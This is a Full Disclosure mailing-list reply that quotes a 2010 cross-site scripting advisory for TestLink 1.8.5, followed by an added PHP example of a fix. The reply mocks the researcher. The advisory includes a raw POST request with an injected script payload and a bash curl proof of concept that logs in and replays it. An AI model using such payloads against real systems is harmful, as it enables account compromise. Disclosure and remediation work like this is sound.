Full Disclosure
mailing list archives
Re: Cross site scripting Vulnerabilities in Testlink Test Management and Execution System
From: Jeff Williams <jeffwillis30 () gmail com>
Date: Sat, 16 Jan 2010 00:03:13 +1100
Prashant,
Usually we do not mention the engineer/dev names in a timeline, that's
totally a jackass move.
Anyone civilized would mention in this case:
"{DATE} <VENDOR NAME> says <CRAP>"
Btw posting an "exploit" to trigger a JS alert, it's priceless;
Dude you made my night.
2010/1/15 Prashant <clickprashant () rediffmail com>
1. Title: Cross site scripting Vulnerabilities in Testlink Test Management and
Execution System.
Discovered by: Prashant Khandelwal (clickprashant () gmail com)
2. Vulnerability Information
Class: Cross site scripting
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
3. Vulnerable packages
Versions affected: All versions <= Testlink 1.8.5
Download:
http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc
4. Vulnerability Description
A cross site scripting vulnerability has been found in Testlink
(http://www.teamst.org/), a popular and acclaimed free, open source test
management tool written in PHP.
The issue discovered can only be exploited with an authenticated
session. This cross site scripting vulnerability is present in the file
/testlink/lib/usermanagement/usersView.php and can be exploited
by setting the variable "order_by_login_dir" as shown below in an HTTP POST
request.
Example HTTP header (tested on 1.8.5)
Set the POST variable order_by_login_dir to >">alert(726367128870)%3B
Request
POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache
operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login
5. Proof Of Concept
======================
#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant () gmail com]
# Cross site scripting in Testlink the Test Management Tool
# Vendor : Testlink http://www.teamst.org
# Affected Version : <=1.8.5 (
# http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc
# )
# Vulnerability Discovered: 5-Jan-2010
# This POC is for educational purpose and has only been tested with
# testlink 1.8.5
if [ $# -ne 3 ]
then
    echo "Usage - $0 User password Testlink_root_dir_URI"
    echo "Example - $0 admin admin http://Testlink-Server/testlink"
    exit 1
fi
# Start from a clean cookie jar and output file.
rm -f cookies userView.php
# Log in with the supplied credentials; the session cookie is saved in "cookies".
curl -d "tl_login=$1&tl_password=$2" "$3/login.php" -c cookies
# Replay the authenticated POST with the payload in order_by_login_dir and save
# the response body, into which the server reflects the parameter.
curl -d 'operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(123456789)%3B&user_order_by=order_by_login' \
    "$3/lib/usermanagement/usersView.php" -b cookies -v > userView.php
echo "Please open userView.php in a browser; a JavaScript alert with the text"
echo "123456789 should pop up"
=====================
6. Report Timeline
I) 5-Jan-2010
Vulnerability discovered
II) 11-Jan-2010
Notified the developers Francisco Mancardi &
Martin Havlat from the testlink team about the vulnerability
III) 11-Jan-2010
Francisco Mancardi asks for POC.
IV) 14-Jan-2010
POCs given
V) 15-Jan-2010
Francisco Mancardi says these vulnerabilities cannot be patched at the
moment and has not committed to any timeline for fixing the same.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
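The parameter at the centre of the advisory is a sort direction, a value with exactly two legitimate forms, so the server has no reason to echo back whatever the client sent. The following is an added illustrative example and not TestLink's own code: a hypothetical handler that reflects `order_by_login_dir` into a hidden form field (the pattern the advisory's request exercises), beside a hardened version that restricts the value to an allowlist and HTML-encodes it on output. The function names, the hidden field and the assumed reflection point are assumptions for illustration; the sample input is constructed from the advisory's request body.

```php
<?php
// Added illustrative example, not TestLink's code. Assumes a page that reads
// the sort-direction parameter from the POST body and reflects it into a
// hidden form field so the next request keeps the same ordering.

// Hypothetical vulnerable pattern: the raw parameter is concatenated into HTML.
// A value containing '">' closes the attribute and the tag, and anything that
// follows is parsed as markup.
function render_sort_field_vulnerable(array $post): string
{
    $dir = isset($post['order_by_login_dir']) ? $post['order_by_login_dir'] : 'asc';
    return '<input type="hidden" name="order_by_login_dir" value="' . $dir . '">';
}

// Hardened: a sort direction is a two-valued enum, so validate it against an
// allowlist before use. The mapped value is what would be safe to place in an
// SQL ORDER BY clause as well; HTML encoding alone would not protect that sink.
function sort_direction(array $post, string $key, string $default = 'asc'): string
{
    $allowed = ['asc' => 'ASC', 'desc' => 'DESC'];
    $raw = isset($post[$key]) ? strtolower((string) $post[$key]) : $default;
    if (!array_key_exists($raw, $allowed)) {
        // Unknown value: fall back to the default rather than echo client input.
        $raw = $default;
    }
    return $raw;
}

function render_sort_field_hardened(array $post): string
{
    $dir = sort_direction($post, 'order_by_login_dir');
    // Output encoding is still applied (defence in depth), even though the
    // allowlist already guarantees the value contains no markup characters.
    return '<input type="hidden" name="order_by_login_dir" value="'
        . htmlspecialchars($dir, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// Constructed input mirroring the advisory's POST body after URL decoding.
$post = [
    'operation'          => 'order_by_role',
    'order_by_role_dir'  => 'asc',
    'order_by_login_dir' => '1>">alert(123456789);',
    'user_order_by'      => 'order_by_login',
];

echo "vulnerable: ", render_sort_field_vulnerable($post), "\n";
echo "hardened:   ", render_sort_field_hardened($post), "\n";
```

Run with `php example.php`. The vulnerable rendering carries the `">` from the payload straight into the page, while the hardened rendering emits `value="asc"` because the payload fails the allowlist check. Treating the direction as an enum rather than as free text is the fix that covers both the HTML sink described in the advisory and the SQL sink such a parameter usually feeds.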